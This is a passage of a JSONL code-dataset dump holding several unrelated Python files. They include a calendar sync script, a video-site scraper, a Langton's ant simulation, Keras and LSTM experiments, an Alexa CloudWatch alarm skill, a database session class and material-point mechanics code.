my_events = [ event for event in my_events if \"임병천\" in event.get(\"summary\")]\n\n # Find event to Add\n print(\"## Find event to Insert\")\n for event in events_share:\n # print(\"# Date : {}\".format(event[\"start\"][\"dateTime\"][:10]))\n # print(\"# Event : {}\".format(event[\"summary\"].strip()))\n\n target_events = [\n my_event\n for my_event in my_events\n if event[\"start\"][\"dateTime\"][:10] 
== my_event[\"start\"][\"date\"]\n and event[\"summary\"].strip() == my_event[\"summary\"].strip()\n ]\n\n if len(target_events) > 1:\n print(\"!!! Check Target Events\")\n break\n elif len(target_events) == 1:\n pass\n else:\n print(\"# Start : {}\\n# End : {}\\n# Event : <{}>\".format(event[\"start\"][\"dateTime\"], event[\"end\"][\"dateTime\"], event[\"summary\"].strip()))\n print(\"=> Insert Event\")\n insert_event(service, MY_CALENDAR_ID, event.get(\"summary\").strip(), event.get(\"start\").get(\"dateTime\")[:10], event.get(\"end\").get(\"dateTime\")[:10])\n\n # Find event to Delete\n print(\"## Find event to Delete\")\n for event in my_events:\n # print(\"# Date : {}\".format(event[\"start\"][\"dateTime\"][:10]))\n # print(\"# Event : {}\".format(event[\"summary\"].strip()))\n\n target_events = [\n share_event\n for share_event in events_share\n if event.get(\"start\").get(\"date\") == share_event[\"start\"][\"dateTime\"][:10]\n and event[\"summary\"].strip() == share_event[\"summary\"].strip()\n ]\n\n if len(target_events) > 1:\n print(\"!!! Check Target Events\")\n break\n elif len(target_events) == 1:\n # delete_event(service, MY_CALENDAR_ID, event[\"id\"]) # for refresh\n pass\n else:\n print(\"# Start : {}\\n# End : {}\\n# Event : <{}>\".format(event[\"start\"][\"date\"], event[\"end\"][\"date\"], event[\"summary\"].strip()))\n print(\"=> Delete Event\")\n delete_event(service, MY_CALENDAR_ID, event[\"id\"])\n\nprint(\"## Finished\")\n\n","sub_path":"calendar_sync.py","file_name":"calendar_sync.py","file_ext":"py","file_size_in_byte":5364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"444605618","text":"from JavPy.sources.BaseSource import ISearchByCode\nimport bs4\nfrom JavPy.functions.datastructure import AV\nfrom JavPy.utils.config import proxy\nimport cloudscraper\n\n\nclass JavFullNet(ISearchByCode):\n __client = cloudscraper.create_scraper()\n\n @classmethod\n def search_by_code(mcs, code):\n url = \"https://javfull.net/?s=\" + code\n html = mcs.__client.get(url, proxies=proxy).text\n bs = bs4.BeautifulSoup(html, \"lxml\")\n item = bs.select(\".item\")[0]\n\n av = AV()\n av.code = code\n av.preview_img_url = item.find(name=\"img\").attrs[\"src\"]\n av.video_url = item.find(name=\"a\").attrs[\"href\"]\n\n return av\n\n @classmethod\n def test(mcs):\n mcs.test_search_by_code(\"n1056\")\n\n\nif __name__ == \"__main__\":\n JavFullNet.test()\n","sub_path":"JavPy/sources/javfull_net.py","file_name":"javfull_net.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"599782748","text":"from Cell2D import Cell2D\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\nfrom utils import underride\n\nclass Turmite(Cell2D):\n\n directions = ['N','E','S','W']\n # compass: N, E, S, W\n compass = [(1,0), (0,1), (-1, 0), (0, -1)]\n rules = {0:1, 1: -1}\n\n def __init__(self, m, n=None):\n \"\"\"Initialize Turmite.\n Currently only built for Langton's Ant.\n m: number of rows\n n: number of columns\n \"\"\"\n Cell2D.__init__(self, m, n)\n self.direction = 0 #Initialize pointing North\n #self.location syntax: (row, col)\n self.location = (m//2, n//2)\n\n def step(self):\n \"\"\"Move ant through one step. 
Currently only works for\n Langton's Ant.\n \"\"\"\n row, col = self.location\n self.turn()\n self.array[row, col] = (self.array[row, col] + 1) % 2\n self.forward()\n\n def turn(self):\n \"\"\"Turn ant based on rules.\"\"\"\n val = self.array[self.location]\n rotate = Turmite.rules[val]\n self.direction = (self.direction + rotate) % 4\n\n def forward(self):\n \"\"\"Move ant forward one unit.\"\"\"\n row, col = self.location\n d_row, d_col = Turmite.compass[self.direction]\n self.location = (row + d_row, col + d_col)\n\n def init_fig(self, **options):\n \"\"\"Initialize figure for animation and drawing.\"\"\"\n options = underride(options,\n cmap='Greens',\n alpha=0.7,\n vmin=0, vmax=1,\n interpolation='none',\n origin='lower',\n extent=[0, self.n, 0, self.m])\n\n self.fig, self.ax = plt.subplots()\n self.im = self.ax.imshow(self.array, **options)\n row, col = self.location\n self.line, = self.ax.plot(col+0.5, row+0.5, 'r.')\n\n def update_anim(frame, self):\n \"\"\"Update frame of animation\"\"\"\n self.step()\n self.im.set_data(self.array)\n row, col = self.location\n self.line.set_data(col+0.5, row+0.5)\n\n def draw(self):\n \"\"\"Draw array and ant.\"\"\"\n self.init_fig()\n self.im.set_data(self.array)\n row, col = self.location\n self.ax.plot(col+0.5, row+0.5, 'r.')\n return self.fig\n\nif __name__ == '__main__':\n\n ant = Turmite(100, 100)\n ani = ant.animate()\n plt.show(block=True)\n","sub_path":"mycode/ch06_ant.py","file_name":"ch06_ant.py","file_ext":"py","file_size_in_byte":2446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"126810276","text":"import numpy as np\nfrom keras.models import Sequential\nfrom keras.models import load_model\nfrom keras.layers.core import Dense, Dropout, Activation\nfrom keras.layers import Conv2D, MaxPooling2D, Flatten\nfrom keras.optimizers import SGD, Adam\nfrom keras.utils import np_utils\nfrom keras.datasets import mnist # mnist: Modified National Institute of Standards and Technology database\nfrom keras.preprocessing.image import array_to_img\nimport matplotlib.pyplot as plt\n\ndef load_data(): # categorical_crossentropy\n (x_train, y_train), (x_test, y_test) = mnist.load_data()\n\n # take first 10,000 images and reshape\n number = 10000\n x_train = x_train[0:number]\n y_train = y_train[0:number]\n x_train = x_train.reshape(number, 28 * 28)\n x_test = x_test.reshape(x_test.shape[0], 28 * 28)\n\n # convert image array to float (from integer provided by mnist)\n x_train = x_train.astype('float32')\n x_test = x_test.astype('float32')\n\n # convert class vectors to binary class matrices\n y_train = np_utils.to_categorical(y_train, 10)\n y_test = np_utils.to_categorical(y_test, 10)\n \n # x_train = x_train\n # x_test = x_test\n\n x_test = np.random.normal(x_test) # add noise\n\n # normalize the pixel values, now each value is 0 ~ 1\n x_train = x_train / 255\n x_test = x_test / 255\n\n return (x_train, y_train), (x_test, y_test)\n\ndef train_model(ep = 20):\n # load training data and testing data\n (x_train, y_train), (x_test, y_test) = load_data()\n\n # define network structure\n model = Sequential()\n\n model.add(Dense(input_dim=28 * 28, units=500, activation='relu'))\n # model.add(Dense(input_dim=28 * 28, units=500, activation='sigmoid'))\n # model.add(Dropout(0.5))\n\n # model.add(Dense(units=500, activation='relu'))\n # model.add(Dense(units=500, activation='sigmoid'))\n\n # model.add(Dropout(0.5))\n model.add(Dense(units=10, activation='softmax'))\n\n # set configurations\n 
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n # model.compile(loss='mse', optimizer=SGD(lr=0.1), metrics=['accuracy'])\n # model.compile(loss='categorical_crossentropy', optimizer=SGD(lr=0.1), metrics=['accuracy'])\n # model.compile(loss='mse', optimizer='adam', metrics=['accuracy'])\n\n # train model\n # increasing batch_size makes the results worse; with a GPU this runs faster due to parallel computing\n model.fit(x_train, y_train, batch_size=100, epochs=ep)\n\n # save model\n # ca: 'categorical_crossentropy' + 'adam'\n # ms: 'mse' + SGD(lr=0.1)\n # cs: 'categorical_crossentropy' + SGD(lr=0.1)\n # ma: 'mse' + 'adam'\n model.save('models/model_ca_ep_{}.h5'.format(ep))\n\n # evaluate the model and output the accuracy\n # result_train = model.evaluate(x_train, y_train)\n # result_test = model.evaluate(x_test, y_test)\n # print('Train Acc:', result_train[1])\n # print('Test Acc:', result_test[1])\n\ndef load_trained_model(ep = 20):\n # load training data and testing data\n (x_train, y_train), (x_test, y_test) = load_data()\n\n # load trained model\n model = load_model('models/model_ca_ep_{}.h5'.format(ep))\n\n # evaluate the model and output the accuracy\n # result_train = model.evaluate(x_train, y_train)\n # result_test = model.evaluate(x_test, y_test)\n # print('Train Acc:', result_train[1])\n # print('Test Acc:', result_test[1])\n\n return model.evaluate(x_train, y_train)[1], model.evaluate(x_test, y_test)[1]\n\nif __name__ == '__main__':\n epochs = [10, 20, 30, 40, 50]\n \n # train model\n # for ep in epochs:\n # train_model(ep)\n\n # load trained model\n training_set_eval = []\n testing_set_eval = []\n\n for ep in epochs:\n res = load_trained_model(ep)\n training_set_eval.append(res[0])\n testing_set_eval.append(res[1])\n\n x = epochs\n y1 = training_set_eval\n y2 = testing_set_eval\n plot1, = plt.plot(x, y1, '-')\n plot2, = plt.plot(x, y2, '--')\n\n plt.xlabel('Epochs')\n plt.ylabel('Accuracy')\n plt.title('mnist accuracy')\n plt.legend((plot1, plot2), ('Training set', 'Testing set'))\n plt.grid()\n plt.show()","sub_path":"keras/ntu_hylee_ml2017/keras_demo/keras_demo_epochs.py","file_name":"keras_demo_epochs.py","file_ext":"py","file_size_in_byte":4141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"318225974","text":"from __future__ import print_function\nimport boto3\n\n#parameters\nregion = 'us-east-1'\n\ndef lambda_handler(event, context):\n if event['request']['type'] == \"LaunchRequest\":\n return on_launch(event['request'], event['session'])\ndef on_launch(launch_request, session):\n return get_welcome_response()\n\ndef get_alarms():\n client = boto3.client('cloudwatch', region_name=region)\n response = client.describe_alarms(StateValue='ALARM')\n if len(response['MetricAlarms']) >= 1:\n return response\n else:\n return None\n\ndef get_welcome_response():\n session_attributes = {}\n card_title = \"AWS CloudWatch Alarms\"\n alarms = get_alarms()\n if alarms:\n speech_output = \"you have active alarms. I will list them now. 
\"\n for alarm in alarms['MetricAlarms']: # iterate the alarm records, not the keys of the response dict\n speech_output = speech_output + \"alarm..\" + alarm['AlarmName']\n else:\n speech_output = \"No outstanding CloudWatch Alarms\"\n reprompt_text = \"Please try again\"\n should_end_session = True\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\ndef build_speechlet_response(title, output, reprompt_text, should_end_session):\n return {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': output\n },\n 'card': {\n 'type': 'Simple',\n 'title': 'SessionSpeechlet - ' + title,\n 'content': 'SessionSpeechlet - ' + output\n },\n 'reprompt': {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': reprompt_text\n }\n },\n 'shouldEndSession': should_end_session\n }\n\n\ndef build_response(session_attributes, speechlet_response):\n return {\n 'version': '1.0',\n 'sessionAttributes': session_attributes,\n 'response': speechlet_response\n }\n","sub_path":"lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"362650366","text":"import datetime\nimport json\n\n\nclass Session:\n def __init__(self, start=None, finish=None, session_id=None, user_id=None):\n self.session_id = session_id\n self.user_id = user_id\n self.start_time = start\n self.finish_time = finish\n\n def start_session(self):\n self.start_time = datetime.datetime.now().isoformat(' ')\n print('session created at %s' % self.start_time)\n\n def finish_session(self):\n self.finish_time = datetime.datetime.now().isoformat(' ')\n print('session finished at %s' % self.finish_time)\n\n def __str__(self):\n return '(%s, %s)' % (self.start_time, self.finish_time)\n\n def as_dict(self):\n d = {\n 'id': self.session_id,\n 'user_id': self.user_id,\n 'start_time': self.start_time,\n 'finish_time': self.finish_time\n }\n return d\n\n def save(self, filename):\n json.dump(self.as_dict(), open(filename, 'wt'))\n\n def load(self, filename):\n object_as_dict = json.load(open(filename))\n self.start_time = object_as_dict['start_time']\n self.finish_time = object_as_dict['finish_time']\n\n def save_to_db(self, connection):\n sql_data = {\n 'session_id': self.session_id,\n 'user_id': self.user_id,\n 'start_time': self.start_time,\n 'finish_time': self.finish_time\n }\n sql_query = 'SELECT id FROM Session WHERE id=%(session_id)s;'\n with connection:\n cur = connection.cursor()\n cur.execute(sql_query, sql_data)\n data = cur.fetchall()\n if data:\n sql_query = 'UPDATE Session SET user_id = %(user_id)s, start_time = %(start_time)s, finishtime = %(finish_time)s WHERE id = %(session_id)s;'\n else:\n sql_query = 'INSERT INTO Session (id, user_id, start_time, finishtime) VALUES (%(session_id)s, %(user_id)s, %(start_time)s, %(finish_time)s);'\n cur.execute(sql_query, sql_data)\n\n def load_from_db(self, connection, session_id):\n sql_data = {\n 'session_id': session_id\n }\n sql_query = 'SELECT id, user_id, start_time, finishtime FROM Session WHERE id = %(session_id)s'\n with connection:\n cur = connection.cursor()\n cur.execute(sql_query, sql_data)\n loaded_data = cur.fetchall()[0]\n self.session_id = loaded_data[0]\n self.user_id = loaded_data[1]\n self.start_time = loaded_data[2]\n self.finish_time = loaded_data[3]\n\n def delete_from_db(self, connection, session_id):\n sql_data = {\n 'session_id': session_id\n }\n sql_query = 'DELETE FROM Session WHERE id = %(session_id)s;'\n with connection:\n cur = 
connection.cursor()\n cur.execute(sql_query, sql_data)\n\n","sub_path":"homework8/mypackage/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"170795142","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nimport string\nimport json\nfrom sklearn.model_selection import train_test_split\nfrom keras.preprocessing import sequence\nfrom keras.utils import np_utils\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation, Embedding, Bidirectional, GlobalMaxPool1D\nfrom keras.layers.core import SpatialDropout1D\nfrom sklearn.model_selection import StratifiedKFold\nfrom keras.datasets import imdb\nfrom keras.layers import LSTM\nfrom keras.layers.convolutional import Conv1D\nfrom keras.layers.convolutional import MaxPooling1D\nfrom keras.models import model_from_json\n\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nfrom nltk.stem import SnowballStemmer\n\nfrom gensim import corpora\n# from imblearn.over_sampling import SMOTE\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import classification_report\n# def parsePhrases(stopWords, engStemmer, phrases):\n# print \"parse the phrases with stopwords and stemmer\"\n# processedPhrases = []\n# for phrase in phrases:\n# tokens = word_tokenize(phrase)\n# parsedWords = []\n# for t in tokens:\n# if t not in stopWords:\n# parsedWords.append(engStemmer.stem(t))\n# processedPhrases.append(parsedWords)\n# return processedPhrases\npostProcessedTrainPhrases = []\npostProcessedTestPhrases = []\n\ndef preprocessData():\n print(\"Loading and preprocessing data...\")\n # load training and testing data\n with open('labeled_document_firstiter.json') as json_data:\n allTrainData = json.load(json_data)\n \n with open('labeled_document_seconditer.json') as json_data:\n allTrainData2 = json.load(json_data)\n\n \n trainPhrases, testPhrases, trainLabel,testLabel = train_test_split(allTrainData['Comment'] + allTrainData2['Comment'], allTrainData['CommentLabel']+allTrainData2['CommentLabel'], test_size=0.2, random_state=42)\n \n# print(testPhrases[0:100])\n punctuation = list(string.punctuation)\n stopWords = stopwords.words('english') + punctuation \n\n engStemmer = SnowballStemmer('english')\n for phrase in trainPhrases:\n if not isinstance(phrase, str):\n continue\n tokens = word_tokenize(phrase)\n parsedWords = []\n for t in tokens:\n if t not in stopWords:\n parsedWords.append(engStemmer.stem(t))\n postProcessedTrainPhrases.append(parsedWords)\n\n for phrase in testPhrases:\n if not isinstance(phrase, str):\n continue\n tokens = word_tokenize(phrase)\n parsedWords = []\n for t in tokens:\n if t not in stopWords:\n parsedWords.append(engStemmer.stem(t))\n postProcessedTestPhrases.append(parsedWords)\n return (trainLabel,testLabel)\n\n\ndef convertPhrasesToIDs(phrases):\n print (\"converting the phrases to id to be processed\")\n wordIDs = []\n wordIDLens = []\n for phrase in phrases:\n ids = []\n for word in phrase:\n ids.append(toIDMap.token2id[word])\n wordIDs.append(ids)\n wordIDLens.append(len(ids))\n return ( wordIDs, wordIDLens )\n\ndef findSequenceLen(wordListLen):\n print( \"calculate the norm sequence length\")\n wordLenMean = np.mean(wordListLen)\n wordLenStd = np.std(wordListLen)\n return np.round(wordLenMean + 3 * wordLenStd).astype(int)\n\n\n\n# In[2]:\n\n\n(trainSenti, testSenti) = preprocessData()\n\n# process training data and testing 
data\n\n# print(len(postProcessedTrainPhrases), len(trainSenti))\ntoIDMap = corpora.Dictionary(np.concatenate((postProcessedTrainPhrases, postProcessedTestPhrases), axis=0))\nallPhraseSize = len(toIDMap.keys())\n\n(trainWordIDs, trainWordIDLens) = convertPhrasesToIDs(postProcessedTrainPhrases)\n(testWordIDs, testWordIDLens) = convertPhrasesToIDs(postProcessedTestPhrases)\n\nsequenceLen = findSequenceLen(trainWordIDLens + testWordIDLens)\n\nprint( \"pad sequence\")\ntrainingData = sequence.pad_sequences(np.array(trainWordIDs), maxlen=sequenceLen)\ntestingData = sequence.pad_sequences(np.array(testWordIDs), maxlen=sequenceLen)\nprint(trainingData.shape)\n\nprint (\"categorize the labels\")\n#print len(np.unique(trainSenti))\ntrainingDataLabel = np_utils.to_categorical(trainSenti, len(np.unique(trainSenti)))\n\n# print(trainingDataLabel.shape)\n\n\n\n# In[6]:\n\n\nfrom sklearn.model_selection import GridSearchCV\nfrom keras.wrappers.scikit_learn import KerasClassifier\nfrom keras.optimizers import SGD\nfrom keras.constraints import maxnorm\nfrom sklearn.metrics import precision_recall_fscore_support\n\n# def create_model(hidden_size, activation, optimizer, dropout_rate):\n# # default values\n# # activation='tanh' # or linear\n# # dropout_rate=0.0 # or 0.2\n# init_mode='uniform'\n# weight_constraint=0 # or 4\n# # optimizer='adam' # or SGD\n# lr = 0.01\n# momemntum=0\n# # hidden_size = 128\n# # create model\n# model = Sequential()\n# model.add(Embedding(allPhraseSize, embedding_size))\n# model.add(SpatialDropout1D(dropout_rate))\n# # model.add(Dense(8, \n# # input_dim=input_dim, kernel_initializer=init_mode, \n# # activation=activation,\n# # kernel_constraint=maxnorm(weight_constraint)))\n# # model.add(Dropout(dropout_rate)) \n# model.add(Bidirectional(LSTM(hidden_size, activation=activation)))\n# model.add(Dense(2, kernel_initializer=init_mode))\n# model.add(Activation(activation))\n# # Compile model\n# model.compile(loss='categorical_crossentropy', \n# optimizer=optimizer, \n# metrics=['accuracy'])\n# return model\n\n# model = KerasClassifier(build_fn=create_model, batch_size=100, epochs=10) \n# epochs = [5, 10, 50, 100, 500]\n# optimizer = ['sgd', 'RMSprop', 'adam']\n# activation = ['tanh','softmax','relu','sigmoid']\n# hid_size = [64, 128, 256]\n# dropoutrate = [0.0, 0.05, 0.1, 0.25, 0.5]\nembedding_size = 128\n# parameters = {'optimizer':('sgd', 'RMSprop', 'adam'), 'activation':[1, 10]}\nactivation = ['sigmoid', 'hard_sigmoid','softmax'] # softmax, softplus, softsign \nhidden_size = [ 128]\n# momentum = [0.0, 0.2, 0.4, 0.6, 0.8, 0.9]\n# learn_rate = [0.001, 0.01, 0.1, 0.2]\ndropout_rate = [0.1, 0.5]\n# weight_constraint=[1, 2, 3, 4, 5]\n# neurons = [1, 5, 10, 15, 20, 25, 30]\n# init = ['uniform', 'lecun_uniform', 'normal', 'zero', 'glorot_normal', 'glorot_uniform', 'he_normal', 'he_uniform']\noptimizer = [ 'SGD', 'RMSprop', 'Adam']\nepochs = [10, 100] \nbatch_size = [256]\n# param_grid = dict(epochs=epochs, batch_size=batch_size, activation = activation, dropout_rate = dropout_rate, optimizer = optimizer, hidden_size = hidden_size)\n\n# grid = GridSearchCV(estimator=model, param_grid=param_grid, n_jobs=-1)\n# grid_result = grid.fit(trainingData,trainingDataLabel) \n# print(\"Best: %f using %s\" % (grid_result.best_score_, grid_result.best_params_))\n# means = grid_result.cv_results_['mean_test_score']\n# stds = grid_result.cv_results_['std_test_score']\n# params = grid_result.cv_results_['params']\n# for mean, stdev, param in zip(means, stds, params):\n# print(\"%f (%f) with: %r\" % (mean, 
stdev, param))\ncount = 1\ntotal_result = {}\ntestingDataLabel = np_utils.to_categorical(testSenti, len(np.unique(testSenti)))\nHIDDEN_SIZE = 128\n# with open(\"parameters_temp.json\", mode='w', encoding='utf-8') as f:\nfor epoch_choice in epochs:\n for batch_choice in batch_size:\n for activation_choice in activation:\n for dropoutrate in dropout_rate:\n for optimizer_choice in optimizer: \n # for HIDDEN_SIZE in hidden_size: \n model = Sequential()\n model.add(Embedding(allPhraseSize, embedding_size))\n model.add(SpatialDropout1D(dropoutrate))\n model.add(Bidirectional(LSTM(HIDDEN_SIZE, return_sequences=True)))\n model.add(Bidirectional(LSTM(HIDDEN_SIZE, return_sequences=True)))\n model.add(Bidirectional(LSTM(HIDDEN_SIZE)))\n #model.add(Bidirectional(LSTM(128)))\n #model.add(Flatten())\n model.add(Dense(len(np.unique(trainSenti))))\n model.add(Activation(activation_choice))\n # model.add(CRF(2, sparse_target=True))\n\n model.compile(loss='categorical_crossentropy', optimizer=optimizer_choice, metrics=['accuracy'])\n\n model.fit(trainingData,trainingDataLabel , epochs=epoch_choice, batch_size=batch_choice, verbose=1)\n\n res = model.predict(testingData)\n res = [(np.array(l)/sum(l)).tolist() for l in res]\n # print(predicted)\n predicted = []\n # negcount = 0\n # poscount = 0\n for i in res:\n if i[0] > i[1]:\n # negcount +=1\n predicted.append(0)\n else:\n # poscount +=1\n predicted.append(1)\n # print(predicted)\n total_result[count] = {}\n\n tn, fp, fn, tp = confusion_matrix(testSenti, predicted).ravel()\n print(tn, fp, fn, tp)\n total_result[count]['confusion_matrix'] = []\n total_result[count]['confusion_matrix'].append(int(tn))\n total_result[count]['confusion_matrix'].append(int(fp))\n total_result[count]['confusion_matrix'].append(int(fn))\n total_result[count]['confusion_matrix'].append(int(tp))\n print(total_result[count]['confusion_matrix'])\n report = precision_recall_fscore_support(testSenti, predicted)\n total_result[count]['precision'] = report[0][0]\n total_result[count]['recall'] = report[1][0]\n total_result[count]['fbeta_score'] = report[2][0]\n print(report)\n # print(report.fbeta_score)\n scores = model.evaluate(testingData, testingDataLabel, verbose=0)\n total_result[count]['accuracy'] = scores[1] * 100\n total_result[count][\"ep\"] = epoch_choice\n total_result[count][\"batch\"] = batch_choice\n total_result[count][\"act\"] = activation_choice\n total_result[count][\"drop\"] = dropoutrate\n total_result[count][\"op\"] = optimizer_choice\n # total_result[count][\"hid\"] = HIDDEN_SIZE\n # total_result[count]['model'] = [epoch_choice, batch_choice,activation_choice,dropoutrate, optimizer_choice,HIDDEN_SIZE]\n f = open(\"parameters_temp_stack3.json\", 'w')\n f.write(json.dumps(total_result, indent=4, sort_keys=True))\n f.close()\n count += 1\n\nf = open(\"parameters_all_stack3.json\", 'w+')\nf.write(json.dumps(total_result, indent=4, sort_keys=True))\nf.close()\n# In[83]:\nimport matplotlib.pyplot as plt\nimport seaborn as sns\ncolor = sns.color_palette()\ny1 = []\ny2 = []\ny3 = []\ny4 = []\nx = range(1,count)\nfor i in x:\n y1.append(total_result[i]['precision'])\n y2.append(total_result[i]['recall'])\n y3.append(total_result[i]['fbeta_score'])\n y4.append(total_result[i]['accuracy'])\n\nplt.figure(figsize=(20,12))\nsns.pointplot(x, y1, alpha=0.8, color=color[1])\nsns.pointplot(x, y2, alpha=0.8, color=color[2])\nsns.pointplot(x, y3, alpha=0.8, color=color[3])\nsns.pointplot(x, y4, alpha=0.8, color=color[4])\n\nplt.ylabel('Evaluation', 
fontsize=12)\nplt.xlabel('Parameters combination', fontsize=12)\nplt.title(\"3-Stack LSTM\", fontsize=15)\nplt.xticks(rotation='vertical')\nplt.savefig(\"LSTM3.png\") # save before show(); otherwise an empty figure is written\nplt.show()\n\n# from sklearn.metrics import precision_recall_fscore_support\n# res = model.predict(testingData)\n# res = [(np.array(l)/sum(l)).tolist() for l in res]\n# # print(predicted)\n# predicted = []\n# negcount = 0\n# poscount = 0\n# for i in res:\n# if i[0] > i[1]:\n# negcount +=1\n# predicted.append(0)\n# else:\n# poscount +=1\n# predicted.append(1)\n\n# print(\"negative: \", negcount)\n# print(\"positive: \", poscount)\n\n# matrix = confusion_matrix(testSenti, predicted)\n# print(matrix)\n# report = precision_recall_fscore_support(testSenti, predicted)\n# print(\"precision: \", report[0][0])\n# print(\"recall: \", report[1][0])\n# print(\"fbeta_score: \",report[2][0] )\n# print(report.recall)\n# # print(report.fbeta_score)\n# scores = model.evaluate(testingData, testingDataLabel, verbose=0)\n# print(\"%s: %.2f%%\" % (model.metrics_names[1], scores[1] * 100))\n\n\n# # In[29]:\n\n\n# model_json = model.to_json()\n# with open(\"LSTM.json\", \"w\") as json_file:\n# json_file.write(model_json)\n# # serialize weights to HDF5\n# model.save_weights(\"LSTM.h5\")\n# print(\"Saved model to disk\")\n\n\n# # In[37]:\n\n\n# json_file = open('LSTM.json', 'r')\n# loaded_model_json = json_file.read()\n# json_file.close()\n# loaded_model = model_from_json(loaded_model_json)\n# # load weights into new model\n# loaded_model.load_weights(\"LSTM.h5\")\n# print(\"Loaded model from disk\")\n\n\n# 1. Number of hidden layers\n# 2. Number of hidden units per layer (usually same number in each layer)\n# 3. Learning rate of the optimizer\n# 4. Dropout rate (in RNNs dropout is perhaps better applied to feed forward connections only)\n# 5. 
Number of iterations\n\n# 1 lstm\n# negative: 310\n# positive: 1936\n# [[ 186 159]\n# [ 124 1777]]\n# precision: 0.6\n# recall: 0.5391304347826087\n# fbeta_score: 0.5679389312977099\n# acc: 87.40%\n# \n# negative: 382\n# positive: 1864\n# [[ 211 134]\n# [ 171 1730]]\n# precision: 0.5523560209424084\n# recall: 0.6115942028985507\n# fbeta_score: 0.5804676753782669\n# acc: 86.42%\n\n# http://colah.github.io/posts/2015-08-Understanding-LSTMs/\n","sub_path":"models/LSTM/LSTM_tuning_stack3.py","file_name":"LSTM_tuning_stack3.py","file_ext":"py","file_size_in_byte":13909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"140352993","text":"title = 'Exercise N°{}'\r\n\r\nprint(title.format(' 1 & 3'), '\\n')\r\n\r\ndef homographic(x):\r\n try:\r\n return 1/x\r\n except Exception as e:\r\n print('\"{}\" error occurred!'.format(e), '\\n')\r\n\r\ndef enter_value(value):\r\n try:\r\n value = int(value)\r\n print('')\r\n print(\"It's homoraphic value is:\", homographic(value), '\\n')\r\n except ValueError:\r\n print('')\r\n print('Please enter a numeric value', '\\n')\r\n value = input('Please enter an integer: ')\r\n return enter_value(value)\r\n\r\nnum = input('Please enter an integer: ')\r\nenter_value(num)\r\n\r\nprint(title.format(2), '\\n')\r\n\r\n#name = input('Please enter your name: ')\r\nlast_name = input('Please enter your last name: ')\r\n\r\ntry:\r\n print('Your full name is', name + ' ' + last_name)\r\nexcept NameError:\r\n print('One of the names are missing')","sub_path":"BootrainAssignment11.py","file_name":"BootrainAssignment11.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"395608602","text":"import datetime\nimport json\n\n\ndef get_time():\n return datetime.datetime.now().isoformat()\n\n\ndef create_msg(data, status, status_msg):\n msg = {\n \"service\": \"insights-storage-broker\",\n \"account\": data.get(\"account\"),\n \"request_id\": data.get(\"request_id\"),\n \"inventory_id\": data.get(\"id\"),\n \"status\": status,\n \"status_msg\": status_msg,\n \"date\": get_time(),\n }\n\n return msg\n\n","sub_path":"src/storage_broker/mq/msgs.py","file_name":"msgs.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"207900275","text":"from numpy import linspace, sin, cos, pi, zeros, outer, array, dot\nfrom numpy import trunc, arctan, eye, trace, nan_to_num, tensordot\nfrom numpy import sqrt, abs, ones\nfrom numpy.linalg import norm\n\ndef elastic(MP,P,G):\n# MP.p = -trace(MP.stress)\n# s_ij = -MP.stress - eye(3)*MP.p\n# MP.q = sqrt(3.*sum(sum(s_ij*s_ij))/2.)\n de_kk = trace(MP.dstrain)\n de_ij = MP.dstrain - de_kk*eye(3)/3.\n MP.dstress = P.S.K*de_kk*eye(3) + 2.*P.S.G*de_ij\n MP.stress += MP.dstress\n MP.gammadot = sqrt(sum(sum(de_ij**2)))\n MP.pressure = trace(MP.stress)/3.\n MP.sigmav = MP.stress[1,1]\n MP.sigmah = MP.stress[0,0]\n for r in xrange(4):\n n = G.nearby_nodes(MP.n_star,r,P)\n G.pressure[n] += MP.N[r]*MP.pressure\n G.gammadot[n] += MP.N[r]*MP.gammadot/P.dt\n G.sigmav[n] += MP.N[r]*MP.sigmav\n G.sigmah[n] += MP.N[r]*MP.sigmah\n\ndef von_mises(MP,P,G):\n de_kk = trace(MP.dstrain) # scalar\n de_ij = MP.dstrain - de_kk*eye(3)/3. 
